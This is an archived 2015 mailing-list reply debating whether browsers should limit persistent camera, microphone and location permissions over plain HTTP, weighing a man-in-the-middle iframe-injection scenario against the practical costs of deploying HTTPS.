On Tue, Mar 10, 2015 at 5:00 PM, Boris Zbarsky <
bzba...@mit.edu> wrote:
> The mitigation applies in this situation:
>
> 1) User connects to a MITMed network (e.g. wireless at the airport or
> coffeeshop or whatever) which I will henceforth call "the attacker".
> 2) No matter what site the user loads, the attacker injects a hidden
> iframe claiming to be from hostname X that the user has granted a
> persistent permissions grant to.
> 3) The attacker now turns the camera/microphone/whatever.
Aha, that makes a lot more sense. Thanks. Yes, that does seem like a
more realistic attack. A few points come to mind:
1) The page has no way to know whether it has persisted permissions
without just trying, right? If so, the user will notice something is
weird when he gets strange permissions requests, which makes the
attack less attractive.
2) If the only common real-world MITM threat is via a compromise
adjacent to the client (e.g., wireless), there's no reason to restrict
geolocation, because the attacker already knows the user's location
fairly precisely.
3) Is there any reason to not persist permissions for as long as the
user remains on the same network (assuming we can figure that out
reliably)? If not, the proposal would be much less annoying, because
in many common cases the permission would be persisted for a long time
anyway. Better yet, can we ask the OS whether the network is
classified as home/work/public and only restrict the persistence for
public networks?
4) Feasible though the attack may be, I'm not sure how likely
attackers are to try it. Is there some plausible profit motive here?
Script kiddies will set up websites and portscan with botnets just for
lulz, but a malicious wireless router requires physical presence,
which is much riskier for the attacker. If I compromised a public
wireless router, I would try passively sniffing for credit card info
in people's unencrypted webmail, or steal their login info. Why would
I blow my cover by trying to take pictures of them?
> Right, and only work if the user loads such a site themselves on that
> network. If I load
cnn.com and get a popup asking whether Google Hangouts
> can turn on my camera, I'd get a bit suspicious... (though I bet a lot of
> people would just click through anyway).
Especially because it says Google Hangouts wants the permission. Why
wouldn't I give permission to Google Hangouts, if I use it regularly?
Maybe it's a bit puzzling that it's asking me right now, but computers
are weird, it probably has some reason. If it was some site I didn't
recognize I might say no, but not if it's a site I use all the time.
I'm not convinced that the proposal increases real-world security
enough to warrant any reduction at all in user convenience.
>> "Switch to HTTPS" is not a reasonable solution.
>
>
> Why not?
Because unless things have changed a lot in the last three years or
so, HTTPS is a pain for a few reasons:
1) It requires time and effort to set up. Network admins have better
things to do. Most of them either are volunteers, work part-time,
computers isn't their primary job responsibility, they're overworked,
etc.
2) It adds an additional point of failure. It's easy to misconfigure,
and you have to keep the certificate up-to-date. If you mess up,
browsers will helpfully go berserk and tell your users that your site
is trying to hack their computer (or that's what users will infer from
the terrifying bright-red warnings). This is not a simple problem to
solve -- for a long time,
https://amazon.com would give a cert error,
and I'm pretty sure I once saw an error on a Google property too. I
think Microsoft too once.
3) Last I checked, if you want a cert that works in all browsers, you
need to pay money. This is a big psychological hurdle for some
people, and may be unreasonable for people who manage a lot of small
domains.
4) It adds round-trips, which is a big deal for people on high-latency
connections. I remember Google was trying to cut it down to one extra
round-trip on the first connection and none on subsequent connections,
but I don't know if that's actually made it into all the major
browsers yet.
These issues seem all basically fixable within a few years, if the
major stakeholders were on board. But until they're fixed, there are
good reasons for sysadmins to be reluctant to use SSL. Ideally,
setting up SSL would like something like this: the webserver
automatically generates a key pair, submits the public key to its
nameserver to be put into its domain's DNSSEC CERT record, queries the
resulting DNSSEC record, and serves it to browsers as its certificate;
and of course automatically re-queries the record periodically so it
doesn't expire. The nameserver can verify the server's IP address
matches the A record to to ensure that it's the right one, unless
someone has compromised the backbone or the nameserver's local
network. In theory you don't need DNSSEC, CACert or whatever would
work too. You would still need SNI in a lot of cases.
Then it would be reasonable to push people to use HTTPS, at least as
an option for people with newer browsers that support the new features
required. An HTTP header to upgrade to HTTPS if the browser supports
the new features might help here.
On Thu, Mar 12, 2015 at 12:28 PM, Anne van Kesteren <
ann...@annevk.nl> wrote:
> It does seem like there are some improvements we could make here. E.g.
> not allow an <iframe> to request certain permissions. Insofar we
> haven't already.
Does that really help? The attacker could just insert a script to
open a new tab in the background that loads its contents in 5 ms (they
come from the local network, after all) and then closes itself.